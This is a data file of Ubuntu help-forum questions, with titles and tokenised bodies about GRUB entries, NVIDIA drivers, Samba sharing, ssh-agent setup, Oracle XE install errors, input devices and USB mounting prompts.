389888	`` ubuntu '' and `` ubuntu 13.10 '' in my grub boot list	i have got `` ubuntu '' as well as `` ubuntu 13.10 '' in the list of boot-able partitions when grub appears . how can i fix this ? this is what my grub looks like : ubuntu advanced options for ubuntu ubuntu 13.10 advanced options for ubuntu 13.10 windows 7 ( loader ) how can i get rid of the duplicate ubuntu entries in the grub boot list ? edit : sudo update-grub2 did n't work , but it does show this : found linux image : /boot/vmlinuz-3.11.0-12-generic found initrd image : /boot/initrd.img-3.11.0-12-generic found ubuntu 13.10 ( 13.10 ) on /dev/mapper/isw_dcgidgaidc_linux2 found windows 7 ( loader ) on /dev/mapper/isw_dcgidgaidc_win7p1
389889	lenovo t60 ubuntu 12.04 lts hard drive problem	i have been running ubuntu 12.04 lts for better than a year on my lenovo t60 . all was fine until i got some errors when booting . the errors are : mount : mounting /dev/disk/by-uuid/ ... ./on root failed : invalid arg mount : mounting /dev /root/dev failed : no such file/dir same on /sys , /proc target filesystem des nt have requested /sbin/init no init found try passing init=bootarg so i do a little research and find the commands for fdisk -1 from the livecd and that is where things go from bad to worse . my ubuntu 12.04 lts cd is scratched and useless . so i download the 12.04 lts from the source and attempt to burn it to a cd . too big . i make a usb image . it wont boot on my t60 , no error messages that i can see , just hangs . i find a friend who has a dvd burner . i burn an iso of the 12.04 image . it boots on the machine it was burned on but not mine . it starts to boot , i get the black screen and the the small rectangle at the bottom of the screen , that clears and then nothing . so , i am running out of ideas . i could buy a 12.04 lts cd , but i am beginning to wonder if that would boot . anyone have any ideas or have seen similar results . i would really like to fix my drive and get back to ubuntu'ing .
389891	install ubuntu 12.04 lts on windows 7 dualboot problem ?	i installed ubuntu 12.04 lts on my windows 7 laptop . i decided to uninstall ubuntu and i shift deleted ubuntu from my disk d. and every boot of my laptop i see two options to choose operating system . in windows 7 i could n't find boot.ini and i could n't reconfigure windows boot loader settings . when i reinstall 12.04 lts , everything seems fine but i ca n't see any grub option on laptop boot . i see only windows 7 and ubuntu ( my ex-ubuntu ) operating system , and when i choose ubuntu it seems crashed ( shift deleted problem ) . so how can i reinstall ubuntu 12.04 and how can i see grub section at startup ?
389893	error : language el_gr utf-8 does not exist ; use system default	i have a problem . when i open my laptop , which was installed with ubuntu , appears an error message which shows : language el_gr utf-8 does not exist ; use system default . why is that and how to solve ?
389894	display issue on ubuntu 12.04 with thinkpad sl500	i installed ubunutu 12.04 to a thinkpad sl500 ( only os on the machine ) , it worked fine once installed , i was making some changes to the configurations ( installing some development packages and setting environment variables to these packages , which i have done previously ) . however once i restarted the machine ( to confirm the updates ) , the gnome interface disappeared ( i am only seeing file on desktop , not all shortcut commands are working ) . i have repeated this twice with the same output . i want to know if someone faced similar issues before .
389896	failed to download repository information while installing updates	when i run system update then i got following error : w : failed to fetch cdrom : //ubuntu 12.04.3 lts _precise pangolin_ - release amd64 ( 20130820.1 ) /dists/precise/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 12.04.3 lts _precise pangolin_ - release amd64 ( 20130820.1 ) /dists/precise/main/binary-amd64/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 12.04.3 lts _precise pangolin_ - release amd64 ( 20130820.1 ) /dists/precise/restricted/binary-amd64/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 12.04.3 lts _precise pangolin_ - release amd64 ( 20130820.1 ) /dists/precise/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms e : some index files failed to download . they have been ignored , or old ones used instead . please help me on this .
389899	upstart : mail error report on segfault	i have a process that 's managed by upstart . it sends an error report on internal exceptions , but since the app is n't written in c , it can not catch a sigsegv and send an error report on that . ( not that that would be a good practice in c either ) . i would think that it should be possible to have upstart kick off a script to send the error report , but i ca n't figure out how to do this . there seem to be three possible approaches : 1 ) a post-stop script . however , exit_signal is not available in a post-stop script 2 ) start on stopped . create a separate upstart config with a start on stopped script . this works great , but only if i remove respawn from the original config . that 's not acceptable . 3 ) use scripting techniques : script cmd & pid= $ ! wait $ pid if [ $ ? = 139 ] ; then cleanup ; fi end script however , the upstart script block appears to work like set -e in a shell , so the script exits when cmd fails , and we never get to the if block .
389900	i ca n't get the nvidia driver to work , anyone any ideas ?	how can i install my nvidia gt735m drivers . my laptop has optimus technology with a hd4000 as powersaving gpu besides the nvidia card . but i canâ´t get my gt735m to work . everytime i try to install it i get a black screen after a reboot ( which is unfixable , and if i manage to get the desktop interface back i can only run a 640x800 res . ) so ... does anyone has a idea how to install this nvidia driver ? ( ps . is it possible to disable my hd4000 and only run the nvidia card for everything including the desktop ? )
389901	how do i get opengl working on an nvidia geforce gt 750m ?	so , what do i have : acer aspire v30772g laptop with an intel video-chipset and an nvidia geforce gt 750m video-card ubuntu 12.04 installed and updated , with the proprietary driver selected ( nvidia-319-updates ) what 's the problem ? opengl does n't seem to be working properly . glxinfo | grep opengl sais opengl is enabled , but it 's software-rendered , so it does not allow the unity 3d features to activate . opengl vendor string : vmware , inc. opengl renderer string : gallium 0.4 on llvmpipe ( llvm 3.3 , 256 bits ) opengl version string : 2.1 mesa 9.2.0 opengl shading language version string : 1.30 opengl extensions : thus compiz is not working properly , especially when i try to configure the virtual workspaces or navigate between them ( it only shows an icon of the topmost application instead of a full view ) . what i have already tried . i have tried installing bumblebee , did not help . i have tried installing the nvidia 331 driver from source . nothing . tried installing the same nvidia-331 driver from xorg-edgers , it did not change the problem , but after i ran apt-get upgrade i was unable to log in after reboot ( the xorg got broken ) . tried the answer below with purging and reinstalling the nvidia drivers . it brought me to the output mentioned above , but still does not work as i need . unity 3d test opengl vendor string : vmware , inc. opengl renderer string : gallium 0.4 on llvmpipe ( llvm 3.3 , 256 bits ) opengl version string : 2.1 mesa 9.2.0 not software rendered : no not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : no
389903	ibus does n't seem to restart	after running the prompt `` ibus exit '' , it successfully exited in the terminal . it was interfering with a program where it did not allow typing in that program . or rather maybe the program was interfering with ibus . regardless , now that the use of the program is done , `` ibus restart '' was entered into the terminal to reactivate it , but now the only thing that comes out is `` ca n't connect to ibus ' . the same thing happens for other functional commands of ibus in terminal . grateful for any feedback for how to turn ibus back on and off at will .
389906	samba issues creating files and folders	im having issues with my samba server , its shared with some win xp/7 machines , sometimes i create folders inside ubuntu , copying files from sd cards or pen drives , sometimes i do the same on windows machines , the problem is , i cant give full access to this files to everyone , all users should be abble to create , del , read , writes etc in all files and folders , but its not happening ... i know im missing some small detail ... i wish u guys could help me ... . # nome do grupo de trabalho workgroup = mshome # como a máquina linux irá aparecer na rede windows netbios name = datasrv # # # # # # # authentication # # # # # # # # modo de acesso aos arquivos do linux security = share # share = para não exigir autenticação # user = para exigir autenticação # ex : security = user guest ok = yes # agora adicione estas linhas no final do arquivo : # nome do compartilhamento [ megacyber ] # descrição do compartilhamento comment = meus docs lan # caminho da pasta , no linux , que será compartilhada path = /home/user/megacyber # se todos os compartilhamentos poderão ser acessados por todos os usuários public = yes # se o compartilhamento será visivel ou oculto na rede ( yes para visível ) browseable = yes # se permitirá escrita writable = yes # somente leitura read only = no # define a mascara em que os arquivos serão criados create mask = 777 # ( terão a permissão rwx somente para o root ) # define a mascara em que os diretórios serão criados directory mask = 777 force create mask = 777 security mask = 777 force security mask = 777
389909	screen does n't reactivate on acer aspire v5-123	i recently installed ubuntu on my new acer aspire v5-123 laptop , after using it with great satisfaction for years on two other laptops . first i got the more common problem of the display manager not starting , but i solved that by installing the proprietary driver . but now i have the problem that every time i close my laptop screen or plug in the hdmi cable or do something else that make the screen goes black , it wo n't turn on anymore . so when i close the screen , and re-open it it does not reactivate , it remains black nothing to be done about it . the computer also does n't goes into stand-by as the power button light remains on . i tried ctrl-alt f2 etc . to reactivate , but no help . the only thing i can do in such situations is hold the power button for five seconds en restart . i try to focus to first put the computer in stand-by before closing the screen , but i quite regularly forget and that means that i am always obligated to shut down by holding the power button for five seconds , and to be honest it irritates the hell out of me , and it ca n't be good for my computer to do that all the time . if there is anyone who recognises this problem or has any solution , that would be very much appreciated and very helpful . thanks in advance !
389910	get the size of a remote file from terminal	i want to download a file from a server , but before doing so i would like to know the actual file size . i know that wget will display the filesize when the download is started , but this actually starts the download process also . how can i just know the filesize of a remote file on an http server ?
389912	installing gcc 4.8 on 13.10 `` the following packages have unmet dependencies ''	when i go to install gcc 4.8 using : sudo apt-get update sudo apt-get install gcc-4.8 g++-4.8 i get the error message : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies . gcc-4.8 : depends : binutils ( > = 2.23.90.20131017 ) but 2.23.52.20130913-0ubuntu1 is to be installed e : unable to correct problems , you have held broken packages . anyone please help ? edit : i tried this but it didnt work : ca n't install gcc 4.8 , dependency issues sudo apt-get clean sudo apt-get update apt-get upgrade -f edit2 : just done fresh install on a second machine . did exactly the same and encountered the same problem . however , when i check the version number for gcc ( and g++ ) it says 4.8.1 ! ? ! ? !
389915	hide windows hidden files and folders that are on windows network share	i have fileserver based o windows server 2008 r2 , that has some shares with hidden files on them . fs on which shares are created is ntfs now i 've mounted those shares in ubuntu using cifs , everything is working fine except that i can see all the hidden files , which is expected , but not desired . is there any possible way not to display those files in ubuntu ? i found that thread : http : //ubuntuforums.org/showthread.php ? t=1882753 & s=c2495b99639759e45b80953f131d3d97 , that says that this is possible if mounting ntfs partition . any possible way to acomplishe this using cifs ? maybe mounting netowk share using ntfs ; would this work ?
389919	want to install ubuntu over linux mint	i have a dual boot computer with both linux mint and windows 7 on it . i want to run ubuntu instead of linux mint . how do i get rid of linux mint and still keep windows 7 without damage to grub also .
389921	how to avoid typing ssh-add everytime	i read and followed some online documentation on how to set up a ssh-agent so that i do n't need to type in password every time i ssh to a remote machine . however , with the help of ssh-agent , i still need to do ssh-add every time i restart the shell . the ssh-add then asks me to enter the passphrase to unlock the private key . enter passphrase for key '/home/xx/.ssh/id_rsa ' : instead of typing in my password for the remote machine , i am asked to type in the password for the private key . it 's like stepping out of a purgatory and found myself in a hell afterwards . it looks like the id_rsa is only temporarily added to the ssh-agent in a session , because every time i log in and type ssh-add -l. i get : the agent has no identities . may i ask how permanently store the key ( id_rsa ) in ssh-agent ? thanks edit : this is what i did with ssh-agent . i appended the following block into ~/.bash_profile sshagent=/usr/bin/ssh-agent sshagentargs= '' -s '' if [ -z `` $ ssh_auth_sock '' -a -x `` sshagent '' ] ; then eval ` $ sshagent $ sshagentargs` trap `` kill $ ssh_agent_pid '' 0 fi
389925	no login possible after reboot possible hang up	i just assembled a small box containing of a sata ssd , 4 gb ram and an atom board ( nm10 d2700 cedarview on a motherborad d270s from foxconn ) . i tried to install a fresh ubuntu on the system and run into an issue there . i tried these so far 64bit 13.10 & 12.04 lts 32bit 13.10 & 12.04 lts the installation ( not using an ubuntu one account , installing 3rd party software and making a swap and an ext4 partition for \ manually ) runs without any problem . i select to prompt the user for the password and did not select auto login . after the reboot the system starts , it displays the graphical login for a fraction of a second and then changes to this image : the keyboard is still reactive ( one can turn on/off num lock and shift lock ) but it is not possible to switch to the consoles . the only thing that works seems to be alt+ctrl+del for a reboot . i swapped the ssd against an old 2.5 hdd containing a 12.04 32bit installation i used to run on another older atom box and it boots up just fine and runs . this indicates to me that the hw is not the cause here . any suggestions how i can get a fresh installation of 13.10 ( 64bit ) running ?
389930	error trying to start oracle database 11g xe on ubuntu 13.10	i can not configure oracle database 11g xe on ubuntu 13.10 . after trying to configure : sudo / etc / init.d / oracle-xe configure this error appears : starting oracle net listener ... done configuring database ... database configuration failed . look into /u01/app/oracle/product/11.2.0/xe/config/log for details and do not understand anything of the errors listed in the log files : clonedbcreation.log create controlfile reuse set database `` xe '' * error at line 1 : ora-01034 : oracle not available process id : 0 session id : 0 serial number : 0 begin dbms_backup_restore.zerodbid ( 0 ) ; end ; * error at line 1 : ora-01034 : oracle not available process id : 0 session id : 0 serial number : 0 ora-01034 : oracle not available ora-27101 : shared memory realm does not exist linux-x86_64 error : 2 : no such file or directory ora-00845 : memory_target not supported on this system create controlfile reuse set database `` xe '' * error at line 1 : ora-01034 : oracle not available process id : 0 session id : 0 serial number : 0 alter system enable restricted session * error at line 1 : ora-01034 : oracle not available process id : 0 session id : 0 serial number : 0 alter database `` xe '' open resetlogs * error at line 1 : ora-01034 : oracle not available process id : 0 session id : 0 serial number : 0 alter database rename global_name to `` xe '' * error at line 1 : ora-01034 : oracle not available process id : 0 session id : 0 serial number : 0 alter system switch logfile * error at line 1 : ora-01034 : oracle not available process id : 0 session id : 0 serial number : 0 alter system checkpoint * error at line 1 : ora-01034 : oracle not available process id : 0 session id : 0 serial number : 0 alter database drop logfile group 3 * error at line 1 : ora-01034 : oracle not available process id : 0 session id : 0 serial number : 0 alter tablespace temp add tempfile '/u01/app/oracle/oradata/xe/temp.dbf ' size 20480k reuse autoextend on next 640k maxsize unlimited * error at line 1 : ora-01034 : oracle not available process id : 0 session id : 0 serial number : 0 select tablespace_name from dba_tablespaces where tablespace_name='users' * error at line 1 : ora-01034 : oracle not available process id : 0 session id : 0 serial number : 0 select sid , program , serial # , username from v $ session * error at line 1 : ora-01034 : oracle not available process id : 0 session id : 0 serial number : 0 alter user sys identified by `` oracle '' * error at line 1 : ora-01034 : oracle not available process id : 0 session id : 0 serial number : 0 alter user system identified by `` oracle '' * error at line 1 : ora-01034 : oracle not available process id : 0 session id : 0 serial number : 0 alter system disable restricted session * error at line 1 : ora-01034 : oracle not available process id : 0 session id : 0 serial number : 0 clonermanrestore.log ora-00845 : memory_target not supported on this system select to_char ( systimestamp , 'yyyymmdd hh : mi : ss ' ) from dual * error at line 1 : ora-01034 : oracle not available process id : 0 session id : 0 serial number : 0 declare * error at line 1 : ora-01034 : oracle not available process id : 0 session id : 0 serial number : 0 select to_char ( systimestamp , 'yyyymmdd hh : mi : ss ' ) from dual * error at line 1 : ora-01034 : oracle not available process id : 0 session id : 0 serial number : 0 postdbcreation.log begin * error at line 1 : ora-01034 : oracle not available process id : 0 session id : 0 serial number : 0 file created . ora-01034 : oracle not available ora-27101 : shared memory realm does not exist linux-x86_64 error : 2 : no such file or directory ora-00845 : memory_target not supported on this system select 'utl_recomp_begin : ' || to_char ( sysdate , 'hh : mi : ss ' ) from dual * error at line 1 : ora-01034 : oracle not available process id : 0 session id : 0 serial number : 0 begin utl_recomp.recomp_serial ( ) ; end ; * error at line 1 : ora-01034 : oracle not available process id : 0 session id : 0 serial number : 0 select 'utl_recomp_end : ' || to_char ( sysdate , 'hh : mi : ss ' ) from dual * error at line 1 : ora-01034 : oracle not available process id : 0 session id : 0 serial number : 0 postscripts.log create or replace library dbms_sumadv_lib as '/u01/app/oracle/product/11.2.0/xe/lib/libqsmashr.so ' ; * error at line 1 : ora-01034 : oracle not available process id : 0 session id : 0 serial number : 0 begin dbms_datapump_utl.replace_default_dir ; end ; * error at line 1 : ora-01034 : oracle not available process id : 0 session id : 0 serial number : 0 commit * error at line 1 : ora-01034 : oracle not available process id : 0 session id : 0 serial number : 0 create or replace directory xmldir as '/u01/app/oracle/product/11.2.0/xe/rdbms/xml' * error at line 1 : ora-01034 : oracle not available process id : 0 session id : 0 serial number : 0 drop directory oracle_ocm_config_dir * error at line 1 : ora-01034 : oracle not available process id : 0 session id : 0 serial number : 0 drop directory admin_dir * error at line 1 : ora-01034 : oracle not available process id : 0 session id : 0 serial number : 0 drop directory work_dir * error at line 1 : ora-01034 : oracle not available process id : 0 session id : 0 serial number : 0 begin dbms_swrf_internal.cleanup_database ( cleanup_local = > false ) ; end ; * error at line 1 : ora-01034 : oracle not available process id : 0 session id : 0 serial number : 0 commit * error at line 1 : ora-01034 : oracle not available process id : 0 session id : 0 serial number : 0 i 'm on the verge of madness ... please somebody help me !
389931	i am having problems with wireless	first time installing ubuntu and have windows xp professional as well on my dell laptop . i can access the internet through my router with a wire but do not know how to fill the blanks on the wireless part , i know the name of the ssi and password .
389934	profiles in ubuntu	ubuntu has profiles like windows ? if there is , for each profile can i set different language of interface ? i had n't used ubuntu yet . sorry for my english .
389938	can i stop touchpad to register mouse ?	sometimes when i write text with my laptop i touch occasionally the touchpad on my computer because my cerebral palsy . i 'm wondering if it is possible to configure ubuntu such that i can use command line to say when the touchpad should register mouse moves and clicks and when not ? i would also like that my usb-mouse would work all the time . i 'm using sony vaio vpceb1e , ubuntu 13.10 , and logitech m185 . here is what xinput says : xinput list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ logitech usb receiver id=10 [ slave pointer ( 2 ) ] ⎜ ↳ logitech usb receiver id=11 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 mouse id=13 [ slave pointer ( 2 ) ] ⎜ ↳ alpsps/2 alps glidepoint id=14 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ sony vaio keys id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ usb 2.0 camera id=9 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=12 [ slave keyboard ( 3 ) ]
389940	re-install after graphic driver issues	so i recently installed ubuntu 12.04.3 lts on a brand new build . i had only used for about a week and then i was prompted to update my nvidia drivers . upon restarting , i was getting the purple screen of death and was unable to get out of it . could n't get grub menu , tried , by using alt+shift+f1 , etc . and just decided to scratch install and start over because i had n't really installed anything yet . i tried re-installing three times with my live cd using all the options ( re-install ubuntu , erase everything , and just reformat my partition ) and now i still ca n't get to boot properly . after one of the installs i did get the grub menu , but after the last install i do n't get grub menu anymore . please advise on a way to do a true 'fresh ' install and wipe everything including grub . i did not have a problem installing initially and now something is causing a problem .
389943	screen shortcuts in terminal conflict with konsole and general gui settings	i 'm starting to use screen in my terminal use ( tired of sshing many times when i need to work ) anyway , i 'm finding that the screen shortcuts conflict with some of my general gui shortcuts . the real problem child is ctrl+a+shift+s to tile . if kopete 's running in the background , it does something with that and then if kopete is n't active , konsole tells me : output has been suspended by presing ctrl+s . prerss ctrl+q to resume . i assume i could just roll up my selves and spend a day really mapping out my hotkeys but i was wondering if there was a quick workaround for this in terminal ( maybe escaping all hot-heys when inside the terminal or some such thing ? ) also , if you have any other setup tips , feel free to post them as well .
389946	how to build and run concorde and traveling salesman problem ?	i need to use a library that is called concorde to solve a well known problem called traveling salesman problem . this library is available here i 've downloaded and compiled it resulting in two main files concorde.a and concorde.h . i 'm using code : :blocks as ide and i 've added the the library file to be used while compiling my application and included the header in my code . however when i try to compile my code , it ca n't find the implementation of the functions defined in the concorde.h file and i get the error `` undefined reference to < function > '' . can anyone help me with that ? running only configure without parameters does n't work in this case , because i need to specify which exact solver concorde will use . in this case ibm cplex through the option -- with-cplex=dir . if i use this option both configure and make work , but make install no and gives me the following error make : *** no rule to make target install ' . stop .
389947	r.a.t 5 mouse freezes for a short time , then start working , why ?	my rat 5 mouse freezes . i can still use it like movie it around but i can not click or drag anything . i see that i can use my keyboard to do these stuff . note : my mouse freezes and then starts working again in a period of time .
389955	how to enable logitech mx5500 media buttons ?	i ca n't use media buttons of my mx5500 on ubuntu 13.10. showkey does n't recognize media buttons at all . using dmesg i found that my keyboard and mouse are bind to /dev/hidraw1 and /dev/hidraw2 when i listen to it this way : sudo cat /dev/hidraw2 | hexdump i can see what my keyboard sends and for my play/pause media button it is 1001 03cd 0000 0010 0103 0000 0000 now , the questing is : what kind of driver or keyboard interrupt handler or what else i can write to make these buttons work . i 'm java programmer myself , so i 'm not really good with c , but i know it little bit , so if somebody can show me a good example of such program , i believe , i will be able to customize it for my purposes . thank you braiam , but it does n't look like it works with my keyboard . i installed it and had to do this trick link /usr/local/lib/libmx5000.so.0.0.0 /usr/lib/libmx5000.so.0 to even get it to run on 13.10 . also i tried to mess around with file /lib/udev/rules.d/70-hid2hci.rules i do n't have such file though , but i found 97-bluetooth-hid2hci.rules and played with it . it did n't help either . mx5000d and mx5000-tool complain about improper device . so i did n't manage to get it to work . for some reason my java solution does n't work quite well too . i did n't get why yet though . accoring to _xmodmap -pke_ : keycode 172 = xf86audioplay xf86audiopause xf86audioplay xf86audiopause and it works if i use tool xsendkeycode like this : xsendkeycode 172 1 ; xsendkeycode 172 0 ; but when i call it from jvm with awt ( robot.keypress ( 172 ) ; robot.keyrelease ( 172 ) ; ) for some reason nothing happens . ( combinations like alt+tab or just keycodes of any non-multimedia key called from jvm works btw ) so maybe i 'll just call xsendkeycode from java ( stupid solution , but at least it will work ) , or try to rewrite it using c lang . package ua.pp.parkee.mx5500.mediabuttons ; import java.awt . * ; import java.io.fileinputstream ; import java.io.ioexception ; class mediabuttonshandler { final static byte [ ] playandpause = { 0x10 , 0x01 , 0x03 , ( byte ) 0xcd , 0x00 , 0x00 , 0x00 } ; public static void main ( string [ ] args ) throws ioexception { fileinputstream stream = new fileinputstream ( `` /dev/hidraw2 '' ) ; byte [ ] bytes = new byte [ 7 ] ; while ( true ) { stream.read ( bytes ) ; boolean match = true ; for ( int i = 0 ; i < playandpause.length & & match == true ; ++i ) { if ( playandpause [ i ] ! = bytes [ i ] ) match = false ; } if ( match ) { system.out.println ( `` play/pause was pressed ! `` ) ; try { robot robot = new robot ( ) ; robot.keypress ( 172 ) ; robot.keyrelease ( 172 ) ; } catch ( awtexception e ) { e.printstacktrace ( ) ; } } /*for ( int i = 0 ; i < bytes.length ; ++i ) { system.out.printf ( `` % 02x `` , bytes [ i ] ) ; if ( i == bytes.length - 1 ) system.out.print ( `` \n '' ) ; } */ } } } i never worked with awt before , so if anybody knows how to get it to work or at least why it does n't work - give me a tip , please .
389961	boot/login delay nvrm : ... system is not currently configured to drive a vga console on the primary vga device	i mess recently with proprietary nvidia drivers 331.20 downloaded from nvidia site and compilation for different kernel to do test for back light issue and now boot/login have some delays of 5-10 seconds . in logs i found this part which seems to be connected to my issue ( it could be in the log from before but i do not remember seeing it earlier ) : lines : [ 27.091750 ] nvidia 0000:01:00.0 : irq 51 for msi/msi-x and [ 28.954092 ] nvidia 0000:07:00.0 : irq 52 for msi/msi-x i have two nvidia cards in my lenovo ideapad y510p . i 'm noob in ubuntu but it feel like system is trying the wrong card first ( wihtout lcd display , and latter falls to second card which drive lcd ) . [ 19.104267 ] input : thinkpad extra buttons as /devices/platform/thinkpad_acpi/input/input15 [ 27.091750 ] nvidia 0000:01:00.0 : irq 51 for msi/msi-x [ 27.097948 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130725/nsarguments-95 ) [ 27.097977 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130725/nsarguments-95 ) [ 27.097990 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130725/nsarguments-95 ) [ 27.098001 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130725/nsarguments-95 ) [ 27.098012 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130725/nsarguments-95 ) [ 27.098034 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130725/nsarguments-95 ) [ 27.098045 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130725/nsarguments-95 ) [ 27.098056 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130725/nsarguments-95 ) [ 27.098070 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130725/nsarguments-95 ) [ 28.453281 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130725/nsarguments-95 ) [ 28.633652 ] nvrm : your system is not currently configured to drive a vga console [ 28.633655 ] nvrm : on the primary vga device . the nvidia linux graphics driver [ 28.633657 ] nvrm : requires the use of a text-mode vga console . use of other console [ 28.633659 ] nvrm : drivers including , but not limited to , vesafb , may result in [ 28.633660 ] nvrm : corruption and stability problems , and is not supported . [ 28.954092 ] nvidia 0000:07:00.0 : irq 52 for msi/msi-x lspci output : radenkovich @ b4da55 : ~ $ lspci 00:00.0 host bridge : intel corporation xeon e3-1200 v3/4th gen core processor dram controller ( rev 06 ) 00:01.0 pci bridge : intel corporation xeon e3-1200 v3/4th gen core processor pci express x16 controller ( rev 06 ) 00:01.1 pci bridge : intel corporation xeon e3-1200 v3/4th gen core processor pci express x8 controller ( rev 06 ) 00:14.0 usb controller : intel corporation 8 series/c220 series chipset family usb xhci ( rev 05 ) 00:16.0 communication controller : intel corporation 8 series/c220 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 8 series/c220 series chipset family usb ehci # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 8 series/c220 series chipset high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 1 ( rev d5 ) 00:1c.3 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 4 ( rev d5 ) 00:1c.4 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 5 ( rev d5 ) 00:1d.0 usb controller : intel corporation 8 series/c220 series chipset family usb ehci # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation hm86 express lpc controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 8 series/c220 series chipset family 6-port sata controller 1 [ ahci mode ] ( rev 05 ) 00:1f.3 smbus : intel corporation 8 series/c220 series chipset family smbus controller ( rev 05 ) 01:00.0 vga compatible controller : nvidia corporation gk107m [ geforce gt 750m ] ( rev a1 ) 01:00.1 audio device : nvidia corporation gk107 hdmi audio controller ( rev a1 ) 07:00.0 3d controller : nvidia corporation gk107m [ geforce gt 750m ] ( rev a1 ) 09:00.0 ethernet controller : qualcomm atheros qca8171 gigabit ethernet ( rev 10 ) 0a:00.0 network controller : intel corporation centrino wireless-n 2230 ( rev c4 ) i could swear these two lines were exactly the same last time i check with nvidia-319 drivers : 01:00.0 vga compatible controller : nvidia corporation gk107m [ geforce gt 750m ] ( rev a1 ) 07:00.0 3d controller : nvidia corporation gk107m [ geforce gt 750m ] ( rev a1 ) help !
389964	dual boot with windows 7 ubuntu not booting	have been working on this for about a week now and if i had any hair i would have torn it out by now ! i am a noob when it comes to all things linux but am learning fast and think i know my way around prety well . so have a win 7 desktop , amd a6-3500 , 8gb ram , single 750gb hard drive , windows 7 64 bit installed on it . now i want an ubuntu dual boot to ease my transition away from windows so have downloaded the iso vreated a usb and used the gui to create a 150gb partition for ubuntu ( lts ) and loaded okay . reboot and no grub screen straight into windows . read a few things and have run boot repair ( http : //paste.ubuntu.com/6563425 ) now when i boot i get the grub screen with all the options but if i try and boot ubuntu , it drops out to a command prompt saying it can not find the boot . if i select the recovery mode it seems to time out on an `` ata5 softreset : ata5 failed ( device not ready ) i have tried various things including easy bcd as well and nothing seems to work . even tried ubuntu 13 , mint but all seem to have the same issue..so akes me think i am doing something wrong each time ... help !
389969	configure chrome to use validia	i 've installed validia on ubuntu 12.04 but as i understood chrome does n't configure to use validia for browsing . any idea how to do that ?
389974	how can i make ubuntu ask for my password before mounting usb-drives ?	i did some research and found my question asked already . it is a duplicate of is it possible to make ubuntu ask for my password before mounting usb-drives ? the problem is , they did not answer that persons question , at all . he did not ask about encrypting a drive . his issue , as is mine , is not protecting a single flash/usb drive , it is protecting his ubuntu system from someone inserting a usb/flash drive he , as well as i , want ubuntu to prompt for our password before mounting any usb drive that gets inserted . how can i do this ? i found this topic how to make ubuntu ask for password when mounting partitions ? but that is for either all drives , or for specific ones . all drives will not work for my setup , as i do not require it to mount internal drives . the individual drives setup will not work either , because in this case the uuid is unknown , so setting it up ahead of time is not possible . i thought the original poster stated the problem well , and it was not a case of misunderstood question , the person answering just did not answer the question asked . i went to add to that already started topic , but the guide that popped up suggested i not ask further questions if the topic is not answered . i hope i did the right thing by creating a new topic . edit : more explanation was asked for . i have internal drives , that do not get mounted when the machine boots . they are dm-crypt encrypted drives that get mounted when i enter my key at the cryptsetup prompt , after the machine is booted and logged in . so requiring the password for all drives will not work . as i mentioned the uuid of an unknown usb/flash drive is well , unknown , so the specific drive setup in fstab will not work either . is there a way to require it for all external drives , but not the internal ones ? i appreciate all the suggestions , even the off-topic ones that do not answer the question i asked edit again : thinking about it , could udev be used to write some rule for this ? i do not understand udev well enough yet , but it seems like that could be useful edit : anders not sure what on that page i should be looking at , but i do not see how to accomplish my goal , with info on that page . please share your idea
